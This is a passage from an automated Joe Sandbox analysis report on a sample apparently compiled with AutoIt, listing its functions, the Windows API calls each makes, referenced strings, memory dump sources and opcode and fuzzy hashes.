Instruction ID: d3949dc42ac2d481bcd4864e7dda109b982d7f1a464bb2f2315ad5a859760564
Opcode Fuzzy Hash: 051ac54638685bb241135184f4dc741910cd71665c93bbbdb81e545b05cc43e2
Instruction Fuzzy Hash: BEF04F35A40208FBDB159F94DC49BEDBBF9EF58751F0001A8F909A2660CB709A80CAD1

Uniqueness

Uniqueness Score: -1.00%

Function 0017D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0017D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0017D3BF
FreeLibrary.KERNEL32(00000000), ref: 0017D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 0017D3B9
X64, xrefs: 0017D2A8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 9b31e52d83f1e3bf80cf0d45aff857c796cd8ab9deec01ef91f94d10202bf88f
Instruction ID: 3bf3fc533d98b5121c44d6e2413e72fb7080ee6e27e9e2b34d7c8442ba7d431c
Opcode Fuzzy Hash: 9b31e52d83f1e3bf80cf0d45aff857c796cd8ab9deec01ef91f94d10202bf88f
Instruction Fuzzy Hash: BBF055B1801A29DBD3385714AC589AD7334BF10B01F93C258F80EF2056DB60CD8286D2

Uniqueness

Uniqueness Score: -1.00%

Function 00124E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00124EDD,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00124EAE
FreeLibrary.KERNEL32(00000000,?,?,00124EDD,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124EC0

Strings

kernel32.dll, xrefs: 00124E94
Wow64DisableWow64FsRedirection, xrefs: 00124EA8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 241fc4938042e5af496c68284b7041d6ef18bf43ee56514061d2ef769d9bc0b3
Instruction ID: e9ec6fbd74094741757da8e77b81c19aa4acf7df8517a3cddb4d8dcf06940247
Opcode Fuzzy Hash: 241fc4938042e5af496c68284b7041d6ef18bf43ee56514061d2ef769d9bc0b3
Instruction Fuzzy Hash: 14E0CD35A016329BE231172DBC1CB9F6558AF81F627060215FC01F3200DBA4CD4245F4

Uniqueness

Uniqueness Score: -1.00%

Function 00124E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00163CDE,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00124E74
FreeLibrary.KERNEL32(00000000,?,?,00163CDE,?,001F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00124E87

Strings

kernel32.dll, xrefs: 00124E5B
Wow64RevertWow64FsRedirection, xrefs: 00124E6E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: ada1513cfb19cd80d0a4868ade1354f744f3d32ec1cd7bd5cb6131f8f269e5ef
Instruction ID: f19d664c36e7c8a9079cca8057de6658bc86160c1648ffbea97bd0bca96cc310
Opcode Fuzzy Hash: ada1513cfb19cd80d0a4868ade1354f744f3d32ec1cd7bd5cb6131f8f269e5ef
Instruction Fuzzy Hash: D9D01235502A3297BA221B297C1CDCF6A18AF85B513060615F915B6124CF64CD5285E0

Uniqueness

Uniqueness Score: -1.00%

Function 001AA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 001AA427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001AA435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 001AA468
CloseHandle.KERNEL32(?), ref: 001AA63D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 1a1af6aa2ddd3a991b9fc06612538f9172ee5d8bc49daea81aae42adb754d54f
Instruction ID: 0adc1c2b078ee98b2088025ac4f31b96ae4afbe945f4f628c929bf156e5bb0c0
Opcode Fuzzy Hash: 1a1af6aa2ddd3a991b9fc06612538f9172ee5d8bc49daea81aae42adb754d54f
Instruction Fuzzy Hash: 54A1C075604300AFD720DF28D886F2AB7E1AF98714F54881DF59A9B2D2D7B0EC45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0018E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0018DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0018CF22,?), ref: 0018DDFD

Part of subcall function 0018DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0018CF22,?), ref: 0018DE16

Part of subcall function 0018E199: GetFileAttributesW.KERNEL32(?,0018CF95), ref: 0018E19A

lstrcmpiW.KERNEL32(?,?), ref: 0018E473
MoveFileW.KERNEL32(?,?), ref: 0018E4AC
_wcslen.LIBCMT ref: 0018E5EB
_wcslen.LIBCMT ref: 0018E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0018E650

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: c90eaa1139fa0fd8d9c3ce21ab1c7b352f0333530b519e3e6fcfda516ba2be4e
Instruction ID: a4b3fe3d0353ddb61d058ff30708659affd09483d8023891fe18d341abfafbff
Opcode Fuzzy Hash: c90eaa1139fa0fd8d9c3ce21ab1c7b352f0333530b519e3e6fcfda516ba2be4e
Instruction Fuzzy Hash: 835153B24083459BC724EBA4DC819DFB3ECAF95340F00492EF589D3191EF74A6888B66

Uniqueness

Uniqueness Score: -1.00%

Function 001AB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

Part of subcall function 001AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001AB6AE,?,?), ref: 001AC9B5
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001AC9F1
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA68
Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001ABAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001ABB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001ABB63
RegCloseKey.ADVAPI32(?,?), ref: 001ABBA6
RegCloseKey.ADVAPI32(00000000), ref: 001ABBB3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 125d9ad0eb834fd756ae14cae83f3ef0fa57683a6fcc788bd1c655624454c5b5
Instruction ID: 3ee5665805687f3f7426037c5efe033d9c190c261fa1bebdb163dc2658b9921f
Opcode Fuzzy Hash: 125d9ad0eb834fd756ae14cae83f3ef0fa57683a6fcc788bd1c655624454c5b5
Instruction Fuzzy Hash: C561AF75208241AFD714DF24C4D0E2ABBE5FF85308F54896CF4998B2A2DB31ED45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00188BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00188BCD
VariantClear.OLEAUT32 ref: 00188C3E
VariantClear.OLEAUT32 ref: 00188C9D
VariantClear.OLEAUT32(?), ref: 00188D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00188D3B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 8d46746668c5436a46ac7d1e49e72123558306bb51e1665b171658fc75bff790
Instruction ID: c70f869ea1a7633799a6db22acc11b51ee5e8baf13a79fcf7d35cf538cb67b62
Opcode Fuzzy Hash: 8d46746668c5436a46ac7d1e49e72123558306bb51e1665b171658fc75bff790
Instruction Fuzzy Hash: 7D516BB5A00619EFCB14DF68C894AAAB7F8FF89310B158559F905DB354E730EA12CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00198AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00198BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00198BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00198C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00198C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00198C5F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 995d0735f213c6a75312ccfc0eb748e7f27f8d411742c916ed3fbb5b26e25d80
Instruction ID: c78453fbb21f25c139d35608302bd286f8f951be3887052ba9c68abf4037cb8d
Opcode Fuzzy Hash: 995d0735f213c6a75312ccfc0eb748e7f27f8d411742c916ed3fbb5b26e25d80
Instruction Fuzzy Hash: 7C512B35A002159FCF05DF64D881AAEBBF5FF49314F088498E849AB3A2DB35ED51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001A8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 001A8F40
GetProcAddress.KERNEL32(00000000,?), ref: 001A8FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 001A8FEC
GetProcAddress.KERNEL32(00000000,?), ref: 001A9032
FreeLibrary.KERNEL32(00000000), ref: 001A9052

Part of subcall function 0013F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00191043,?,753CE610), ref: 0013F6E6
Part of subcall function 0013F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0017FA64,00000000,00000000,?,?,00191043,?,753CE610,?,0017FA64), ref: 0013F70D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: e680d26a94d4d692331f9896d796cb5cac8caab2aecd381db4b84b4f291ec1b4
Instruction ID: 03acd67fdcc38661e90d0acacd53b56e49001a814afeea1338bdee48f1aa328d
Opcode Fuzzy Hash: e680d26a94d4d692331f9896d796cb5cac8caab2aecd381db4b84b4f291ec1b4
Instruction Fuzzy Hash: FA513A38604215DFCB15DF58D4848ADBBF1FF5A314F0980A8E806AB362DB31ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001B6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 001B6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 001B6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001B6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0019AB79,00000000,00000000), ref: 001B6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001B6CC7

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: ce053e0144875691246ec997e93539c2e12a34c352006208e31f013cd9d4941c
Instruction ID: e35679da99e9c8d664bee9d754d59fe077e09f004a6ac656e89997e609a382f9
Opcode Fuzzy Hash: ce053e0144875691246ec997e93539c2e12a34c352006208e31f013cd9d4941c
Instruction Fuzzy Hash: 2841D135A04104AFDB24CF28CD58FF97FA5EB1A360F150268F999A72E0C375ED41DA90

Uniqueness

Uniqueness Score: -1.00%

Function 00152051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001520C3
_free.LIBCMT ref: 001520E3

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f6452a5fff9e47357c9ca761220fdc1d0feeb621d01e5598f5295ed88d433e7d
Instruction ID: 416124b841df13777450dec6639bd29060224b910582ccc1b2ec5e3b5c63c843
Opcode Fuzzy Hash: f6452a5fff9e47357c9ca761220fdc1d0feeb621d01e5598f5295ed88d433e7d
Instruction Fuzzy Hash: 8141AF37A00200DBCB24DFB8C981A5EB7E5EF8A314F154568E925EF391D731AD05CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0013912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00139141
ScreenToClient.USER32(00000000,?), ref: 0013915E
GetAsyncKeyState.USER32(00000001), ref: 00139183
GetAsyncKeyState.USER32(00000002), ref: 0013919D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 775e086697b4290b856614a1be82b7b3adafda63dffe8d898f1fc18443e3f803
Instruction ID: be10393787921958c76a9243ae6df61b752ab107d756cfec660844cedc06ed7d
Opcode Fuzzy Hash: 775e086697b4290b856614a1be82b7b3adafda63dffe8d898f1fc18443e3f803
Instruction Fuzzy Hash: B5414D71A0861ABBDF19AF64C848BEEB774FB05330F208229E429A72D0C7706954CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00193874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 001938CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00193922
TranslateMessage.USER32(?), ref: 0019394B
DispatchMessageW.USER32(?), ref: 00193955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00193966

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 456e8bc4efc9832b1d7de24b47c6fb7d2d40ad3503d6485aeabcf168f27533ee
Instruction ID: 21ca445df4ce71e50697d62c6098ff79a5a9ad6bf26b152abcadef87ffced3dd
Opcode Fuzzy Hash: 456e8bc4efc9832b1d7de24b47c6fb7d2d40ad3503d6485aeabcf168f27533ee
Instruction Fuzzy Hash: 7231A070904342EEEF39CB359848BB637E8AB15308F04066DE476C65E0E7B4AAC5CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0019CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0019CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0019CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0019C21E,00000000), ref: 0019CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0019C21E,00000000), ref: 0019CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0019C21E,00000000), ref: 0019CFF2

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 25adaa7c7d24f43648aaa8f77d740effa2c1a68e579fa64ae8d5fb8a74c21e39
Instruction ID: ef79ab106f40d2d4d31b421cacef91f0be299bddb3cb57a326d98fae794749f0
Opcode Fuzzy Hash: 25adaa7c7d24f43648aaa8f77d740effa2c1a68e579fa64ae8d5fb8a74c21e39
Instruction Fuzzy Hash: C3315C71A00205EFDF24DFA5C884AABBBF9EB14350B10442EF556D2551EB30AE41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00181901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00181915
PostMessageW.USER32(00000001,00000201,00000001), ref: 001819C1
Sleep.KERNEL32(00000000,?,?,?), ref: 001819C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 001819DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 001819E2

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: e6613b4e1809d7f876fe4ea4aaa16ae6ebc6a2aff38581e0f9ac426f70ba8b98
Instruction ID: 3aa78051b2bafdfa586c10eb0d114f85c4237ce978e2c7698000357e19505e34
Opcode Fuzzy Hash: e6613b4e1809d7f876fe4ea4aaa16ae6ebc6a2aff38581e0f9ac426f70ba8b98
Instruction Fuzzy Hash: EE31AF72900219EFCB04DFA8C999AEE3BB9EB04319F104225F961A72D1C7709A45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001B5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 001B5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 001B579D
_wcslen.LIBCMT ref: 001B57AF
_wcslen.LIBCMT ref: 001B57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 001B5816

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 1b7fe54324ee262a8513095f2a036cff4070b20cf2d8a69f805b10796685e8c7
Instruction ID: 9dcbb9f436191895af41aa5cd7b0c3c649cc1fd6d222e64f1080c1343f32b2df
Opcode Fuzzy Hash: 1b7fe54324ee262a8513095f2a036cff4070b20cf2d8a69f805b10796685e8c7
